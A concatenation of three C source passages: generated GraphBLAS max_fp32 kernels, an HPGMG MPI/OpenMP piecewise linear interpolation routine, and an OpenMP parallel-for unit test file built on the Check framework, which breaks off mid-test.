//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__max_fp32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__max_fp32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *Cx = (float *) Cx_output ;
float x = (*((float *) x_input)) ;
float *Bx = (float *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
float bij = GBX (Bx, p, false) ;
Cx [p] = fmaxf (x, bij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__max_fp32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
float *Cx = (float *) Cx_output ;
float *Ax = (float *) Ax_input ;
float y = (*((float *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
float aij = GBX (Ax, p, false) ;
Cx [p] = fmaxf (aij, y) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = fmaxf (x, aij) ; \
}
GrB_Info GB (_bind1st_tran__max_fp32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
float
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float x = (*((const float *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
float
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = fmaxf (aij, y) ; \
}
GrB_Info GB (_bind2nd_tran__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float y = (*((const float *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
interpolation_pl.c | //------------------------------------------------------------------------------------------------------------------------------
// Samuel Williams
// SWWilliams@lbl.gov
// Lawrence Berkeley National Lab
//------------------------------------------------------------------------------------------------------------------------------
#include <math.h>
//------------------------------------------------------------------------------------------------------------------------------
static inline void InterpolateBlock_PL(level_type *level_f, int id_f, double prescale_f, level_type *level_c, int id_c, blockCopy_type *block){
// interpolate 3D array from read_i,j,k of read[] to write_i,j,k in write[]
int write_dim_i = block->dim.i<<1; // calculate the dimensions of the resultant fine block
int write_dim_j = block->dim.j<<1;
int write_dim_k = block->dim.k<<1;
int read_i = block->read.i;
int read_j = block->read.j;
int read_k = block->read.k;
int read_jStride = block->read.jStride;
int read_kStride = block->read.kStride;
int write_i = block->write.i;
int write_j = block->write.j;
int write_k = block->write.k;
int write_jStride = block->write.jStride;
int write_kStride = block->write.kStride;
double * __restrict__ read = block->read.ptr;
double * __restrict__ write = block->write.ptr;
if(block->read.box >=0){
read = level_c->my_boxes[ block->read.box].vectors[ id_c] + level_c->my_boxes[ block->read.box].ghosts*(1+level_c->my_boxes[ block->read.box].jStride+level_c->my_boxes[ block->read.box].kStride);
read_jStride = level_c->my_boxes[block->read.box ].jStride;
read_kStride = level_c->my_boxes[block->read.box ].kStride;
}
if(block->write.box>=0){
write = level_f->my_boxes[block->write.box].vectors[id_f] + level_f->my_boxes[block->write.box].ghosts*(1+level_f->my_boxes[block->write.box].jStride+level_f->my_boxes[block->write.box].kStride);
write_jStride = level_f->my_boxes[block->write.box].jStride;
write_kStride = level_f->my_boxes[block->write.box].kStride;
}
int i,j,k;
for(k=0;k<write_dim_k;k++){
for(j=0;j<write_dim_j;j++){
for(i=0;i<write_dim_i;i++){
int write_ijk = ((i )+write_i) + (((j )+write_j)*write_jStride) + (((k )+write_k)*write_kStride);
int read_ijk = ((i>>1)+ read_i) + (((j>>1)+ read_j)* read_jStride) + (((k>>1)+ read_k)* read_kStride);
//
// | o | o |
// +---+---+---+---+
// | | x | x | |
//
      // CAREFUL !!! you must guarantee that the MPI buffers (write[]) and the destination boxes were zeroed at some point, to avoid 0.0*NaN or 0.0*inf
// piecewise linear interpolation... NOTE, BC's must have been previously applied
int delta_i= -1;if(i&0x1)delta_i= 1; // i.e. even points look backwards while odd points look forward
int delta_j=-read_jStride;if(j&0x1)delta_j=read_jStride;
int delta_k=-read_kStride;if(k&0x1)delta_k=read_kStride;
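      // the eight weights below are the trilinear interpolation coefficients at
      // the fine-grid quarter points: products of 3/4 and 1/4 per dimension
      // (0.421875 = 27/64, 0.140625 = 9/64, 0.046875 = 3/64, 0.015625 = 1/64)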
write[write_ijk] = prescale_f*write[write_ijk] +
0.421875*read[read_ijk ] +
0.140625*read[read_ijk +delta_k] +
0.140625*read[read_ijk +delta_j ] +
0.046875*read[read_ijk +delta_j+delta_k] +
0.140625*read[read_ijk+delta_i ] +
0.046875*read[read_ijk+delta_i +delta_k] +
0.046875*read[read_ijk+delta_i+delta_j ] +
0.015625*read[read_ijk+delta_i+delta_j+delta_k];
}}}
}
//------------------------------------------------------------------------------------------------------------------------------
// perform an (inter-level) piecewise linear interpolation
void interpolation_pl(level_type * level_f, int id_f, double prescale_f, level_type *level_c, int id_c){
exchange_boundary(level_c,id_c,0);
apply_BCs_linear(level_c,id_c);
uint64_t _timeCommunicationStart = CycleTime();
uint64_t _timeStart,_timeEnd;
int buffer=0;
int n;
#ifdef USE_MPI
// by convention, level_f allocates a combined array of requests for both level_f recvs and level_c sends...
int nMessages = level_c->interpolation.num_sends + level_f->interpolation.num_recvs;
MPI_Request *recv_requests = level_f->interpolation.requests;
MPI_Request *send_requests = level_f->interpolation.requests + level_f->interpolation.num_recvs;
// loop through packed list of MPI receives and prepost Irecv's...
_timeStart = CycleTime();
#ifdef USE_MPI_THREAD_MULTIPLE
#pragma omp parallel for schedule(dynamic,1)
#endif
for(n=0;n<level_f->interpolation.num_recvs;n++){
MPI_Irecv(level_f->interpolation.recv_buffers[n],
level_f->interpolation.recv_sizes[n],
MPI_DOUBLE,
level_f->interpolation.recv_ranks[n],
7, // by convention, piecewise linear interpolation uses tag=7
MPI_COMM_WORLD,
&recv_requests[n]
);
}
_timeEnd = CycleTime();
level_f->cycles.interpolation_recv += (_timeEnd-_timeStart);
// pack MPI send buffers...
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_c->interpolation.num_blocks[0]>1) schedule(static,1)
for(buffer=0;buffer<level_c->interpolation.num_blocks[0];buffer++){InterpolateBlock_PL(level_f,id_f,0.0,level_c,id_c,&level_c->interpolation.blocks[0][buffer]);} // !!! prescale==0 because you don't want to increment the MPI buffer
_timeEnd = CycleTime();
level_f->cycles.interpolation_pack += (_timeEnd-_timeStart);
// loop through MPI send buffers and post Isend's...
_timeStart = CycleTime();
#ifdef USE_MPI_THREAD_MULTIPLE
#pragma omp parallel for schedule(dynamic,1)
#endif
for(n=0;n<level_c->interpolation.num_sends;n++){
MPI_Isend(level_c->interpolation.send_buffers[n],
level_c->interpolation.send_sizes[n],
MPI_DOUBLE,
level_c->interpolation.send_ranks[n],
7, // by convention, piecewise linear interpolation uses tag=7
MPI_COMM_WORLD,
&send_requests[n]
);
}
_timeEnd = CycleTime();
level_f->cycles.interpolation_send += (_timeEnd-_timeStart);
#endif
// perform local interpolation... try and hide within Isend latency...
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_c->interpolation.num_blocks[1]>1) schedule(static,1)
for(buffer=0;buffer<level_c->interpolation.num_blocks[1];buffer++){InterpolateBlock_PL(level_f,id_f,prescale_f,level_c,id_c,&level_c->interpolation.blocks[1][buffer]);}
_timeEnd = CycleTime();
level_f->cycles.interpolation_local += (_timeEnd-_timeStart);
// wait for MPI to finish...
#ifdef USE_MPI
_timeStart = CycleTime();
if(nMessages)MPI_Waitall(nMessages,level_f->interpolation.requests,level_f->interpolation.status);
_timeEnd = CycleTime();
level_f->cycles.interpolation_wait += (_timeEnd-_timeStart);
// unpack MPI receive buffers
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_f->interpolation.num_blocks[2]>1) schedule(static,1)
for(buffer=0;buffer<level_f->interpolation.num_blocks[2];buffer++){IncrementBlock(level_f,id_f,prescale_f,&level_f->interpolation.blocks[2][buffer]);}
_timeEnd = CycleTime();
level_f->cycles.interpolation_unpack += (_timeEnd-_timeStart);
#endif
level_f->cycles.interpolation_total += (uint64_t)(CycleTime()-_timeCommunicationStart);
}
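// Note: the function above follows the usual communication/computation overlap
// pattern: prepost Irecv's, pack and post Isend's, perform the local
// interpolation while messages are in flight, then Waitall and unpack.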
|
test.c | #include <stdlib.h>
#include <check.h>
#include <omp.h>
START_TEST(omp_parallel_for)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_parallel_for_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads;
int num_threads2;
#pragma omp parallel for shared(a)
for(int i=0; i<128; i++)
{
a[i] = 0;
num_threads = omp_get_num_threads();
}
#pragma omp parallel for shared(a) num_threads(num_threads/2)
for(int i=0; i<num_threads/2; i++)
{
a[i] = i;
num_threads2 = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i >= num_threads2 ? 0 : i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads/2, num_threads2);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(static) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
// TODO: Add test for teams larger than number of MIR workers.
// Large teams are unsupported in MIR.
// The test should therefore pass if MIR throws an assertion.
START_TEST(omp_parallel_for_static_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(static) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(static) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(dynamic) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(dynamic) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(dynamic) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(guided) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(guided) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(guided) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(runtime) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_reduction)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(runtime) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_reduction_num_threads_one)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(runtime) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_dynamic)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_dynamic_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_guided)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_guided_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_static)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_static_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_static_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(static) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(dynamic) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(guided) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static_reduction)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
